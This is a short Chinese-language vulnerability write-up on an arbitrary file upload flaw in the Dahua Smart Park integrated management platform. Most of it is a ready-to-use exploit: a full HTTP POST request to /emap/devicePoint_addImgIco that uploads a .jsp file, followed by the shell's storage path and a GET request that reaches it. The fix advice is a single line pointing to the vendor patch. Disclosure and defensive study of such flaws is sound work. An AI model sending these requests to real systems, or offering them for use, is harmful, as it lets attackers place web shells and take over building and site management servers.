0x01 前言

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。

该设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上。

0x02 漏洞等级

高危

0x03 漏洞影响

大华智慧园区综合管理平台

0x04 漏洞复现

微信图片_20230818202253_副本.png

EXP:


POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 232
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982

--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

23332143454e
--f3aeb22be281d77542546a2f71e20982--
微信图片_20230818202253_1_副本.png

shell地址:

http://ip/upload/emap/society_new/返回地文件名.jsp

GET /upload/emap/society_new/ico_res_03327756f9e6_on.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
微信图片_20230818202254_副本.png

0x05 修复建议

官方已经发布修复补丁,请进行升级。